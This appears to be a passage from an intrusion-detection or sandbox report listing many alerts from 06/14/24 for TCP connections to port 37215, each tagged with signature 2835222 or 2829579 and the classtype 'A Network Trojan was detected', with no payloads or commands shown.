                Timestamp:06/14/24-10:44:31.082171
                SID:2835222
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805599
                SID:2829579
                Source Port:38890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182154
                SID:2829579
                Source Port:41686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244631
                SID:2829579
                Source Port:56566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997293
                SID:2835222
                Source Port:47428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024153
                SID:2829579
                Source Port:32962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452805
                SID:2835222
                Source Port:49212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383293
                SID:2829579
                Source Port:52864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761510
                SID:2835222
                Source Port:53844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501697
                SID:2835222
                Source Port:39700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724899
                SID:2835222
                Source Port:37762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452672
                SID:2835222
                Source Port:38000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969785
                SID:2829579
                Source Port:40630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183821
                SID:2835222
                Source Port:59870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185986
                SID:2835222
                Source Port:48854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882040
                SID:2835222
                Source Port:56252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028157
                SID:2835222
                Source Port:50676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998451
                SID:2835222
                Source Port:57702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966975
                SID:2829579
                Source Port:59862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971413
                SID:2829579
                Source Port:44888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290420
                SID:2829579
                Source Port:42708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083350
                SID:2829579
                Source Port:46152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025460
                SID:2829579
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131918
                SID:2835222
                Source Port:52516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683248
                SID:2829579
                Source Port:59214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178109
                SID:2835222
                Source Port:40622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227634
                SID:2829579
                Source Port:33182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761666
                SID:2829579
                Source Port:45110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451543
                SID:2835222
                Source Port:52226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644283
                SID:2835222
                Source Port:60680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135084
                SID:2835222
                Source Port:59348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151109
                SID:2829579
                Source Port:49282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149212
                SID:2835222
                Source Port:50762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502801
                SID:2829579
                Source Port:39320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114877
                SID:2829579
                Source Port:53682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132350
                SID:2829579
                Source Port:58412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792122
                SID:2829579
                Source Port:37624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671625
                SID:2829579
                Source Port:34048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679159
                SID:2829579
                Source Port:50194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180014
                SID:2829579
                Source Port:45692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420930
                SID:2835222
                Source Port:43874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183732
                SID:2835222
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701852
                SID:2829579
                Source Port:55130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133975
                SID:2835222
                Source Port:35666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200225
                SID:2829579
                Source Port:39256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074308
                SID:2835222
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933509
                SID:2829579
                Source Port:38850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054082
                SID:2829579
                Source Port:52640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406619
                SID:2829579
                Source Port:55312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862340
                SID:2829579
                Source Port:49448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776249
                SID:2829579
                Source Port:36142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420611
                SID:2829579
                Source Port:57276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718186
                SID:2835222
                Source Port:50808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010288
                SID:2829579
                Source Port:33866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242990
                SID:2829579
                Source Port:54834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471388
                SID:2835222
                Source Port:34908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.162293
                SID:2829579
                Source Port:60518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073852
                SID:2829579
                Source Port:54948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472556
                SID:2829579
                Source Port:55690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788788
                SID:2835222
                Source Port:48954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614445
                SID:2829579
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453282
                SID:2835222
                Source Port:51660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670640
                SID:2829579
                Source Port:50800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669030
                SID:2829579
                Source Port:34998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001245
                SID:2835222
                Source Port:33146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968611
                SID:2829579
                Source Port:55098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470345
                SID:2835222
                Source Port:43482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074555
                SID:2835222
                Source Port:43216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661973
                SID:2829579
                Source Port:50488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295708
                SID:2829579
                Source Port:56096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131515
                SID:2829579
                Source Port:38192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131466
                SID:2835222
                Source Port:40096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880201
                SID:2835222
                Source Port:43744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176785
                SID:2835222
                Source Port:52882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907364
                SID:2829579
                Source Port:47138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274436
                SID:2829579
                Source Port:44808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339842
                SID:2829579
                Source Port:60696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503707
                SID:2829579
                Source Port:58166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029009
                SID:2835222
                Source Port:37604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735971
                SID:2829579
                Source Port:33974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020203
                SID:2835222
                Source Port:52748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202512
                SID:2829579
                Source Port:41112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001612
                SID:2835222
                Source Port:59336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641793
                SID:2835222
                Source Port:56552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979429
                SID:2829579
                Source Port:43648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905964
                SID:2835222
                Source Port:57328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367886
                SID:2829579
                Source Port:58170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761900
                SID:2829579
                Source Port:34544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985178
                SID:2835222
                Source Port:47474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177969
                SID:2829579
                Source Port:52002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675706
                SID:2835222
                Source Port:47012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997232
                SID:2829579
                Source Port:46144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778292
                SID:2829579
                Source Port:40486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566502
                SID:2829579
                Source Port:56306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777029
                SID:2835222
                Source Port:51492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323125
                SID:2829579
                Source Port:59790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050829
                SID:2829579
                Source Port:44748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520609
                SID:2829579
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114919
                SID:2829579
                Source Port:57546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726522
                SID:2835222
                Source Port:57410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942448
                SID:2829579
                Source Port:52792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185718
                SID:2835222
                Source Port:43734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947092
                SID:2829579
                Source Port:58136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663182
                SID:2835222
                Source Port:35026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615130
                SID:2835222
                Source Port:37564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051967
                SID:2829579
                Source Port:34916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149079
                SID:2835222
                Source Port:50598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409069
                SID:2835222
                Source Port:41460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163190
                SID:2835222
                Source Port:49538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789360
                SID:2835222
                Source Port:43296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792089
                SID:2829579
                Source Port:42292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662414
                SID:2829579
                Source Port:54522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017256
                SID:2829579
                Source Port:36266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052201
                SID:2829579
                Source Port:38946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644886
                SID:2835222
                Source Port:54598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.231072
                SID:2835222
                Source Port:54414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382631
                SID:2835222
                Source Port:46284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178863
                SID:2835222
                Source Port:33618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682137
                SID:2829579
                Source Port:53272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990962
                SID:2829579
                Source Port:47954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290211
                SID:2829579
                Source Port:40080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984540
                SID:2829579
                Source Port:46646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051231
                SID:2835222
                Source Port:47856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718834
                SID:2835222
                Source Port:51310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675847
                SID:2835222
                Source Port:58406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805910
                SID:2835222
                Source Port:42894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998161
                SID:2829579
                Source Port:53356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988081
                SID:2829579
                Source Port:33380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718753
                SID:2829579
                Source Port:57320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762330
                SID:2829579
                Source Port:60862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202997
                SID:2829579
                Source Port:44438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295287
                SID:2829579
                Source Port:44920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682015
                SID:2829579
                Source Port:56818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998643
                SID:2829579
                Source Port:49012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807457
                SID:2829579
                Source Port:60842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999543
                SID:2835222
                Source Port:46456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502183
                SID:2829579
                Source Port:55316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367271
                SID:2829579
                Source Port:53902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340349
                SID:2829579
                Source Port:59674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762253
                SID:2829579
                Source Port:58976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423570
                SID:2829579
                Source Port:60316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985025
                SID:2835222
                Source Port:42514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978701
                SID:2829579
                Source Port:41926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969627
                SID:2835222
                Source Port:38288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016489
                SID:2835222
                Source Port:51662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685398
                SID:2835222
                Source Port:57684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420870
                SID:2835222
                Source Port:56874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022650
                SID:2829579
                Source Port:47906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850794
                SID:2829579
                Source Port:42518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661259
                SID:2829579
                Source Port:52628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581790
                SID:2829579
                Source Port:55048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021140
                SID:2835222
                Source Port:37624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030673
                SID:2829579
                Source Port:46710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321356
                SID:2829579
                Source Port:58884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018274
                SID:2829579
                Source Port:36406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074276
                SID:2835222
                Source Port:55926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881520
                SID:2829579
                Source Port:47108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806576
                SID:2835222
                Source Port:42108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410768
                SID:2829579
                Source Port:40586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777954
                SID:2835222
                Source Port:56976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134870
                SID:2829579
                Source Port:38270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644139
                SID:2835222
                Source Port:43604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133324
                SID:2835222
                Source Port:55214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086829
                SID:2835222
                Source Port:58986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186230
                SID:2829579
                Source Port:39838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640696
                SID:2829579
                Source Port:34688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915949
                SID:2835222
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776945
                SID:2829579
                Source Port:56666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906954
                SID:2835222
                Source Port:50070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942793
                SID:2829579
                Source Port:56076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057763
                SID:2835222
                Source Port:43590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734765
                SID:2835222
                Source Port:50180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015232
                SID:2829579
                Source Port:37294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942119
                SID:2835222
                Source Port:60306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078299
                SID:2829579
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829488
                SID:2829579
                Source Port:54278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726113
                SID:2835222
                Source Port:55342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.404973
                SID:2835222
                Source Port:55188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735190
                SID:2835222
                Source Port:56052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934993
                SID:2829579
                Source Port:58686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501438
                SID:2829579
                Source Port:58644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411579
                SID:2829579
                Source Port:52958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020292
                SID:2829579
                Source Port:58908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616045
                SID:2835222
                Source Port:50060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022613
                SID:2829579
                Source Port:55446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030478
                SID:2829579
                Source Port:42274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023297
                SID:2835222
                Source Port:44342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339678
                SID:2829579
                Source Port:52990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971569
                SID:2829579
                Source Port:53672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201010
                SID:2835222
                Source Port:59416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699956
                SID:2829579
                Source Port:58256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726565
                SID:2829579
                Source Port:41874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672246
                SID:2835222
                Source Port:45776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180292
                SID:2829579
                Source Port:33266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149900
                SID:2835222
                Source Port:38226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858836
                SID:2835222
                Source Port:46548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663018
                SID:2829579
                Source Port:54992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013898
